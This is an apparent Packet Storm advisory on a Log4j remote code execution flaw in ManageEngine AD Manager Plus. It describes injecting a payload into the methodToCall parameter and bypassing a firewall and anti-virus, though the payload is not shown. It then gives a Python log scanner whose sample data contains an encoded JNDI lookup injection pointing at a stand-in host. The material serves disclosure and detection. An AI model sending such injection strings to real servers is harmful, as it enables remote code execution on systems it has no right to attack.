AD Manager Plus 7122 Remote Code Execution

Published: 03 Apr 2023. Reported by Chan Nyein Wai, Thura Moe Myint. Type: packetstorm. Source: packetstormsecurity.com

AD Manager Plus 7122 Remote Code Execution vulnerability and Log4j exploi

Code
# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE)  
# Exploit Author: Chan Nyein Wai & Thura Moe Myint  
# Vendor Homepage: https://www.manageengine.com/products/ad-manager/  
# Software Link: https://www.manageengine.com/products/ad-manager/download.html  
# Version: Ad Manager Plus Before 7122  
# Tested on: Windows  
# CVE : CVE-2021-44228  
# Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md  
  
### Description  
  
In the summer of 2022, I was doing a security engagement on the Synack  
Red Team in collaboration with my good friend (Thura Moe Myint).  
At that time, Log4j was already widespread on the internet. ManageEngine  
had already patched Ad Manager Plus to prevent it from  
being affected by the Log4j vulnerability. They had mentioned that  
Log4j was not affected by Ad Manager Plus. However, we determined that  
Ad Manager Plus was running on our target and managed to exploit  
the Log4j vulnerability.  
  
### Exploitation  
  
First, let's make a login request through a proxy.  
  
Inject the following payload in the `methodToCall` parameter of  
the `ADSearch.cc` request.  
  
Then you will get a DNS callback containing the username in your Burp Collaborator.  
  
### Notes  
  
When we initially reported this vulnerability to Synack, we only  
managed to get a DNS callback and our report was marked as LDAP  
injection. However, we attempted to gain full RCE on the host but were  
not successful. Later, we discovered that Ad Manager Plus was running  
on another target, so we tried to get full RCE on that target. We  
realized that there was a firewall and an anti-virus running on the  
machine, so most of our payloads wouldn't work. After spending a  
considerable amount of time, we eventually managed to bypass the  
firewall and anti-virus and achieved full RCE.  
  
### Conclusion  
  
We had already informed Zoho about the log4j vulnerability, and even  
after it was fixed, they decided to reward us with a bonus bounty for  
our report.  
  
### Mitigation  
  
Updating to a version of Ad Manager Plus higher than 7122 should  
resolve the issue.  
  
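As an added detection example (not part of the original advisory and not ManageEngine's code), the following Python scanner reads web-server access-log lines, pulls the `methodToCall` parameter out of each request and flags any value that is not a bare method name, since a Log4j lookup string such as `${jndi:...}` can never be a legitimate value for that parameter. The log format, the sample lines, the `/ADSearch.cc` path and the `example.invalid` host are constructed for the example; it checks every request carrying the parameter, not only `ADSearch.cc`, and `classify_method_to_call` can equally be applied to values taken from a captured POST body.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (common log format); not taken from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Apr/2023:10:01:02 +0000] "POST /ADSearch.cc?methodToCall=search HTTP/1.1" 200 512
10.0.0.7 - - [03/Apr/2023:10:01:09 +0000] "POST /ADSearch.cc?methodToCall=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 200 512
10.0.0.9 - - [03/Apr/2023:10:02:00 +0000] "GET /Home.cc?methodToCall=loadHome HTTP/1.1" 200 64
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A legitimate methodToCall value is a plain Java-style method name (assumption for this example).
SAFE_METHOD_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def classify_method_to_call(value: str) -> Optional[str]:
    """Return a reason string if the value looks like a Log4j lookup injection, else None."""
    decoded = value
    for _ in range(3):  # peel off up to three layers of URL encoding
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "${jndi:" in decoded.lower():
        return "jndi lookup"
    if "${" in decoded:
        return "log4j lookup syntax"
    if not SAFE_METHOD_NAME.match(decoded):
        return "non-identifier value"
    return None


def scan_access_log(text: str) -> list:
    """Flag every request whose methodToCall parameter is not a bare method name."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        url = urlsplit(m["target"])
        # parse_qs already applies one round of URL decoding to each value
        for value in parse_qs(url.query, keep_blank_values=True).get("methodToCall", []):
            reason = classify_method_to_call(value)
            if reason:
                findings.append({"ip": m["ip"], "ts": m["ts"], "path": url.path, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} methodToCall flagged: {f['reason']}")
```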
